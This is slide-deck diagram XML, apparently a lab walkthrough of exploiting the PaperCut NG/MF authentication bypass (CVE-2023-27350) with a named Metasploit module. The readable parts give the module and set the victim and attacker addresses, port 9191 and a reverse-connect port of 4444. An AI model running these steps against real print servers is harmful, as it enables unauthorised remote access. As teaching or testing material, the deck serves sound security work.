    <dgm:cxn modelId="{D1AE1DA0-07C7-6D44-ADEB-6CD004C6C868}" type="presParOf" srcId="{B859BFCF-DF6A-2148-9911-1345A9BB562F}" destId="{DDBF5CB2-8F5B-E540-820C-5280CF95BC71}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{9539EF03-4C33-7E41-A792-AA68FD19D079}" type="presParOf" srcId="{B859BFCF-DF6A-2148-9911-1345A9BB562F}" destId="{B0384050-5C8F-2442-870D-AC9C2372E49C}" srcOrd="11" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{30AECCC0-D1A2-2349-8C82-7344D9DCA1F3}" type="presParOf" srcId="{B859BFCF-DF6A-2148-9911-1345A9BB562F}" destId="{2710EA5E-C778-574A-BCB9-34036A5F8213}" srcOrd="12" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{55A1DDFA-669B-5347-9152-131F4F66F91F}" type="presParOf" srcId="{B859BFCF-DF6A-2148-9911-1345A9BB562F}" destId="{92F19EB2-AF97-9F49-A8A3-A4B81ABA7E2E}" srcOrd="13" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{0DF568C6-9C45-6B43-9FB6-6841CA4FFA4F}" type="presParOf" srcId="{B859BFCF-DF6A-2148-9911-1345A9BB562F}" destId="{05085D1D-68E8-4140-961D-8B4F4F098364}" srcOrd="14" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{32D27EF5-6402-0440-8129-AB19B07BCE1C}" type="presParOf" srcId="{B859BFCF-DF6A-2148-9911-1345A9BB562F}" destId="{EFAC4F41-E2A5-C94C-836F-E2A1CC4D5C21}" srcOrd="15" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{52D01064-FDE0-144F-BB66-AE12C7B7740F}" type="presParOf" srcId="{B859BFCF-DF6A-2148-9911-1345A9BB562F}" destId="{A4DBDC3F-0C99-3D4A-9546-DB440B8DD493}" srcOrd="16" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{1986C670-505B-3D46-8BF5-A7F6BD847BD5}" type="presParOf" srcId="{B859BFCF-DF6A-2148-9911-1345A9BB562F}" destId="{F0713DA5-AF3F-AA42-BEB7-A5B1340AC017}" srcOrd="17" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{D4114B97-995D-494D-A55F-CD4646D19D40}" type="presParOf" srcId="{B859BFCF-DF6A-2148-9911-1345A9BB562F}" destId="{C4D77DF7-04FF-D24E-A2A6-7E28BEBEEACE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E457A9-5D67-4C09-B3B8-4B0F5E80F68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3A0804-3F29-477A-8885-B6E38DED0B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CMD -</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" dirty="0"/>
            <a:t>use exploit/multi/http/</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" dirty="0" err="1"/>
            <a:t>papercut_ng_auth_bypass</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{494EE0DD-37F2-4C79-8F82-B22C75CA22EC}" type="parTrans" cxnId="{DCF46EF3-C593-4FA7-A405-D7E6AA900F04}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D62662F3-FE71-4509-94AB-0DDCFD1FC2B5}" type="sibTrans" cxnId="{DCF46EF3-C593-4FA7-A405-D7E6AA900F04}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AA0E2896-0C68-43D7-A21C-3D35872A985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/>
            <a:t>Metasploit Module: exploit/multi/http/</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" b="1" dirty="0" err="1"/>
            <a:t>papercut_ng_auth_bypass</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{14B304C5-86AB-42E0-A294-AEE9B8B83BDD}" type="parTrans" cxnId="{272BDBB8-48B2-4F86-AD64-44A342A7C18D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CF5C421B-184A-43C1-8943-A826B1279EDC}" type="sibTrans" cxnId="{272BDBB8-48B2-4F86-AD64-44A342A7C18D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{20CA19D2-F4F9-4E15-A109-C6AC13B9992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The exploit/multi/http/</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" dirty="0" err="1"/>
            <a:t>papercut_ng_auth_bypass</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" dirty="0"/>
            <a:t> module targets a critical </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" b="1" dirty="0"/>
            <a:t>authentication bypass vulnerability</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" dirty="0"/>
            <a:t> in </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" dirty="0" err="1"/>
            <a:t>PaperCut</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" dirty="0"/>
            <a:t> NG and </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" dirty="0" err="1"/>
            <a:t>PaperCut</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" dirty="0"/>
            <a:t> MF print management software. This vulnerability is tracked as </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" b="1" dirty="0"/>
            <a:t>CVE-2023-27350</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" dirty="0"/>
            <a:t>.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3EC139AB-66FE-4A9F-BD64-601137C94F02}" type="parTrans" cxnId="{5CEC5971-E83B-44DC-A372-4E8440C930F9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1E4B1C30-669B-43EA-8CA5-F0366CDC612C}" type="sibTrans" cxnId="{5CEC5971-E83B-44DC-A372-4E8440C930F9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E1578CDF-1CC0-4CF7-B664-BAC99EDC91E3}" type="pres">
      <dgm:prSet presAssocID="{36E457A9-5D67-4C09-B3B8-4B0F5E80F689}" presName="root" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4482B109-A338-46FA-BF7F-4057B0915E10}" type="pres">
      <dgm:prSet presAssocID="{2A3A0804-3F29-477A-8885-B6E38DED0B48}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{156C3B22-071C-4062-AA37-0F35BB040322}" type="pres">
      <dgm:prSet presAssocID="{2A3A0804-3F29-477A-8885-B6E38DED0B48}" presName="bgRect" presStyleLbl="bgShp" presStyleIdx="0" presStyleCnt="3" custScaleY="105226" custLinFactX="9583" custLinFactNeighborX="100000" custLinFactNeighborY="6211"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A3626F69-75E1-417B-8A94-3AEB2B76464E}" type="pres">
      <dgm:prSet presAssocID="{2A3A0804-3F29-477A-8885-B6E38DED0B4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432B6D7E-DFEA-4A46-BD8B-0C9AF9EFD999}" type="pres">
      <dgm:prSet presAssocID="{2A3A0804-3F29-477A-8885-B6E38DED0B48}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C733175B-7DA9-4E40-B363-21852094A784}" type="pres">
      <dgm:prSet presAssocID="{2A3A0804-3F29-477A-8885-B6E38DED0B48}" presName="parTx" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="3" custScaleX="112683" custScaleY="147448">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{60EE112B-C560-43D1-B675-BCE79A04EDE3}" type="pres">
      <dgm:prSet presAssocID="{D62662F3-FE71-4509-94AB-0DDCFD1FC2B5}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{855059C5-6FD5-4129-B463-0BFA70969E12}" type="pres">
      <dgm:prSet presAssocID="{AA0E2896-0C68-43D7-A21C-3D35872A9850}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E85886CE-50D5-4FE9-A3E7-3BEF18C7CBCD}" type="pres">
      <dgm:prSet presAssocID="{AA0E2896-0C68-43D7-A21C-3D35872A9850}" presName="bgRect" presStyleLbl="bgShp" presStyleIdx="1" presStyleCnt="3" custLinFactNeighborX="1256" custLinFactNeighborY="-4588"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B9EFDCFD-4630-4FD0-9A2B-1E878209E586}" type="pres">
      <dgm:prSet presAssocID="{AA0E2896-0C68-43D7-A21C-3D35872A98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335B7C18-626D-445C-9952-6C365D983F20}" type="pres">
      <dgm:prSet presAssocID="{AA0E2896-0C68-43D7-A21C-3D35872A9850}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{210190EF-6363-470E-9ED2-DF4166F62C21}" type="pres">
      <dgm:prSet presAssocID="{AA0E2896-0C68-43D7-A21C-3D35872A9850}" presName="parTx" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D87A6A4E-96F2-48AE-94D3-CE9F6E919F6C}" type="pres">
      <dgm:prSet presAssocID="{CF5C421B-184A-43C1-8943-A826B1279EDC}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1832B930-4AC5-4751-8763-92A2013F331B}" type="pres">
      <dgm:prSet presAssocID="{20CA19D2-F4F9-4E15-A109-C6AC13B99920}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{935AA0A1-5642-4D6A-8190-4379065F4ABE}" type="pres">
      <dgm:prSet presAssocID="{20CA19D2-F4F9-4E15-A109-C6AC13B99920}" presName="bgRect" presStyleLbl="bgShp" presStyleIdx="2" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FF38DB3D-6778-4801-838D-A6117CC9B5DE}" type="pres">
      <dgm:prSet presAssocID="{20CA19D2-F4F9-4E15-A109-C6AC13B9992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D30DF0BE-8E6D-4D6B-8AB5-8B811DF78AEC}" type="pres">
      <dgm:prSet presAssocID="{20CA19D2-F4F9-4E15-A109-C6AC13B99920}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F657626B-9FFB-4254-8208-06BBE0E0C782}" type="pres">
      <dgm:prSet presAssocID="{20CA19D2-F4F9-4E15-A109-C6AC13B99920}" presName="parTx" presStyleLbl="revTx" presStyleIdx="2" presStyleCnt="3" custScaleX="106233" custScaleY="103692" custLinFactNeighborX="-4721" custLinFactNeighborY="4236">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{00F01227-658D-4BB4-9EDC-354CC62995B9}" type="presOf" srcId="{20CA19D2-F4F9-4E15-A109-C6AC13B99920}" destId="{F657626B-9FFB-4254-8208-06BBE0E0C782}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{423F0337-F037-4819-8267-7F151C271E06}" type="presOf" srcId="{2A3A0804-3F29-477A-8885-B6E38DED0B48}" destId="{C733175B-7DA9-4E40-B363-21852094A784}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{9C8B5565-D97D-4C5E-946C-976CB9C5E2B7}" type="presOf" srcId="{36E457A9-5D67-4C09-B3B8-4B0F5E80F689}" destId="{E1578CDF-1CC0-4CF7-B664-BAC99EDC91E3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{5CEC5971-E83B-44DC-A372-4E8440C930F9}" srcId="{36E457A9-5D67-4C09-B3B8-4B0F5E80F689}" destId="{20CA19D2-F4F9-4E15-A109-C6AC13B99920}" srcOrd="2" destOrd="0" parTransId="{3EC139AB-66FE-4A9F-BD64-601137C94F02}" sibTransId="{1E4B1C30-669B-43EA-8CA5-F0366CDC612C}"/>
    <dgm:cxn modelId="{272BDBB8-48B2-4F86-AD64-44A342A7C18D}" srcId="{36E457A9-5D67-4C09-B3B8-4B0F5E80F689}" destId="{AA0E2896-0C68-43D7-A21C-3D35872A9850}" srcOrd="1" destOrd="0" parTransId="{14B304C5-86AB-42E0-A294-AEE9B8B83BDD}" sibTransId="{CF5C421B-184A-43C1-8943-A826B1279EDC}"/>
    <dgm:cxn modelId="{BADAB9E2-9505-4DF5-B395-F084726AC71E}" type="presOf" srcId="{AA0E2896-0C68-43D7-A21C-3D35872A9850}" destId="{210190EF-6363-470E-9ED2-DF4166F62C21}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{DCF46EF3-C593-4FA7-A405-D7E6AA900F04}" srcId="{36E457A9-5D67-4C09-B3B8-4B0F5E80F689}" destId="{2A3A0804-3F29-477A-8885-B6E38DED0B48}" srcOrd="0" destOrd="0" parTransId="{494EE0DD-37F2-4C79-8F82-B22C75CA22EC}" sibTransId="{D62662F3-FE71-4509-94AB-0DDCFD1FC2B5}"/>
    <dgm:cxn modelId="{AC34F5A3-9950-48D3-A034-D0251D3C2C95}" type="presParOf" srcId="{E1578CDF-1CC0-4CF7-B664-BAC99EDC91E3}" destId="{4482B109-A338-46FA-BF7F-4057B0915E10}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{49908446-31A8-4A9D-B27F-BF3738F0641C}" type="presParOf" srcId="{4482B109-A338-46FA-BF7F-4057B0915E10}" destId="{156C3B22-071C-4062-AA37-0F35BB040322}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{148DE9C8-4B21-4036-8E3D-6E52BE9A3610}" type="presParOf" srcId="{4482B109-A338-46FA-BF7F-4057B0915E10}" destId="{A3626F69-75E1-417B-8A94-3AEB2B76464E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{2E48362D-0D73-446E-A237-B633CC1B4156}" type="presParOf" srcId="{4482B109-A338-46FA-BF7F-4057B0915E10}" destId="{432B6D7E-DFEA-4A46-BD8B-0C9AF9EFD999}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{3595F194-3AF5-47F9-AFC9-CAB6FC2085A9}" type="presParOf" srcId="{4482B109-A338-46FA-BF7F-4057B0915E10}" destId="{C733175B-7DA9-4E40-B363-21852094A784}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{B8FEEB00-E5AB-439B-85FA-7D80B9C65B95}" type="presParOf" srcId="{E1578CDF-1CC0-4CF7-B664-BAC99EDC91E3}" destId="{60EE112B-C560-43D1-B675-BCE79A04EDE3}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{16194B61-B9DC-4846-BB25-1EA1BEA4FBEF}" type="presParOf" srcId="{E1578CDF-1CC0-4CF7-B664-BAC99EDC91E3}" destId="{855059C5-6FD5-4129-B463-0BFA70969E12}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{DD71A036-7EAD-46A0-9D84-87293664191D}" type="presParOf" srcId="{855059C5-6FD5-4129-B463-0BFA70969E12}" destId="{E85886CE-50D5-4FE9-A3E7-3BEF18C7CBCD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{F58A3A6F-F1CD-4D6A-87DA-20E2ED2D28CE}" type="presParOf" srcId="{855059C5-6FD5-4129-B463-0BFA70969E12}" destId="{B9EFDCFD-4630-4FD0-9A2B-1E878209E586}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{271D07D6-92C5-4C0D-924F-C6EC06CC75B8}" type="presParOf" srcId="{855059C5-6FD5-4129-B463-0BFA70969E12}" destId="{335B7C18-626D-445C-9952-6C365D983F20}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{998248A9-9CCF-4795-9C16-EE7B526863C2}" type="presParOf" srcId="{855059C5-6FD5-4129-B463-0BFA70969E12}" destId="{210190EF-6363-470E-9ED2-DF4166F62C21}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{B756C70D-AE08-418C-94D3-8F2BB2A8A0D5}" type="presParOf" srcId="{E1578CDF-1CC0-4CF7-B664-BAC99EDC91E3}" destId="{D87A6A4E-96F2-48AE-94D3-CE9F6E919F6C}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{040A0B55-9BAE-4037-BE00-7BEBB10D5F9F}" type="presParOf" srcId="{E1578CDF-1CC0-4CF7-B664-BAC99EDC91E3}" destId="{1832B930-4AC5-4751-8763-92A2013F331B}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{DD1E9C17-9F82-4EE0-902E-BCE1013C3C78}" type="presParOf" srcId="{1832B930-4AC5-4751-8763-92A2013F331B}" destId="{935AA0A1-5642-4D6A-8190-4379065F4ABE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{747FF8D3-2D2C-446C-9418-0978246B4BF7}" type="presParOf" srcId="{1832B930-4AC5-4751-8763-92A2013F331B}" destId="{FF38DB3D-6778-4801-838D-A6117CC9B5DE}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{B03988AF-3175-4574-9BF8-883110F8B61D}" type="presParOf" srcId="{1832B930-4AC5-4751-8763-92A2013F331B}" destId="{D30DF0BE-8E6D-4D6B-8AB5-8B811DF78AEC}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{9554BC6B-0D84-4E10-A7EF-BA0E78EC74A8}" type="presParOf" srcId="{1832B930-4AC5-4751-8763-92A2013F331B}" destId="{F657626B-9FFB-4254-8208-06BBE0E0C78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8E2CA23-5280-4788-B17E-1DDCAA82EA00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F1CEB2-EE50-45C3-A379-882C7D8F50F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set RHOST 192.168.3.101 – Vitim IP</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B64E9112-F0BD-4017-A86D-AFF5D7900A12}" type="parTrans" cxnId="{86AB57CF-E47F-4AC5-AB2D-DFA95891D523}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{57164268-121F-423B-9DA6-800C95010096}" type="sibTrans" cxnId="{86AB57CF-E47F-4AC5-AB2D-DFA95891D523}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9FD842F9-04CE-4278-B5A1-979E6DF83D9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set RPORT 9191 – Vitim Port of which the server is running in port number &lt;&gt;</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BA113E8E-AF10-4446-AAB2-061CCEB9641F}" type="parTrans" cxnId="{E7A575F9-B89E-4C74-99CE-582C0B054907}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{572E8631-D450-4DD5-BAE5-B90CBAA8ED05}" type="sibTrans" cxnId="{E7A575F9-B89E-4C74-99CE-582C0B054907}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{01A16D35-2AA1-4CDB-933E-13FDAE05ED9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set LHOST 192.168.3.100 – Attacker IP</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7F7A988C-116F-4AF4-BB60-1B3AAC137D95}" type="parTrans" cxnId="{D6E72619-E541-46EF-95A8-E0D835804924}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4364A9E0-8076-4D69-ACAF-FE0C1D5CB28F}" type="sibTrans" cxnId="{D6E72619-E541-46EF-95A8-E0D835804924}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3D9C30F8-F88D-4A6C-9FE2-565F430C2D4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set LPORT 4444 – Attacker Port to reverse connect </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CD55193D-ACF0-4A62-9618-313922E7081F}" type="parTrans" cxnId="{96206B8A-9606-41E2-B89F-4D5CF0B13300}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ACD68654-7D09-47AE-9C15-345605DAD69E}" type="sibTrans" cxnId="{96206B8A-9606-41E2-B89F-4D5CF0B13300}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FD2A2F1F-1B0D-46FC-A3FE-730A223D286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set VERBOSE true – For detailed output of attack </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E4F40B03-5647-4B3E-8AA1-0B226147B519}" type="parTrans" cxnId="{0BDD0ECC-399F-42FB-A65B-A5277858C12C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{868B6094-34C5-4756-B003-3E5D16F985E9}" type="sibTrans" cxnId="{0BDD0ECC-399F-42FB-A65B-A5277858C12C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4ECCCB50-338E-4265-AF05-72729829A28C}" type="pres">
      <dgm:prSet presAssocID="{98E2CA23-5280-4788-B17E-1DDCAA82EA00}" presName="root" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{28945185-7314-4CC9-A5ED-6F5E269D187D}" type="pres">
      <dgm:prSet presAssocID="{7CF1CEB2-EE50-45C3-A379-882C7D8F50FB}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8A36D67D-4125-4F62-B6EE-74C5C42DECA3}" type="pres">
      <dgm:prSet presAssocID="{7CF1CEB2-EE50-45C3-A379-882C7D8F50FB}" presName="iconBgRect" presStyleLbl="bgShp" presStyleIdx="0" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{026F5BD5-D363-4AF0-887B-700C3502AE13}" type="pres">
      <dgm:prSet presAssocID="{7CF1CEB2-EE50-45C3-A379-882C7D8F50FB}" presName="iconRect" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="5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278D8E9A-4E7E-43CD-95D4-7DB2011EC909}" type="pres">
      <dgm:prSet presAssocID="{7CF1CEB2-EE50-45C3-A379-882C7D8F50FB}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D79844BA-E611-463C-955E-E0748B6AA742}" type="pres">
      <dgm:prSet presAssocID="{7CF1CEB2-EE50-45C3-A379-882C7D8F50FB}" presName="textRect" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:chPref val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4DD157A6-28F3-4B7E-BC5C-02A79C43EC44}" type="pres">
      <dgm:prSet presAssocID="{57164268-121F-423B-9DA6-800C95010096}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C83498F4-6228-452D-A3F2-DF99E666F9B8}" type="pres">
      <dgm:prSet presAssocID="{9FD842F9-04CE-4278-B5A1-979E6DF83D93}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D70CC773-3A24-4456-87C7-2483D8CBEC72}" type="pres">
      <dgm:prSet presAssocID="{9FD842F9-04CE-4278-B5A1-979E6DF83D93}" presName="iconBgRect" presStyleLbl="bgShp" presStyleIdx="1" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B4C9E2E4-EC0D-4C5B-B9C5-3E82D936880E}" type="pres">
      <dgm:prSet presAssocID="{9FD842F9-04CE-4278-B5A1-979E6DF83D93}" presName="iconRect" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="5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30B8F338-D7F9-4EB3-A9B3-3B99DB8B9D04}" type="pres">
      <dgm:prSet presAssocID="{9FD842F9-04CE-4278-B5A1-979E6DF83D93}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A2F3AA57-7EF2-4E03-9BD4-638972A688A8}" type="pres">
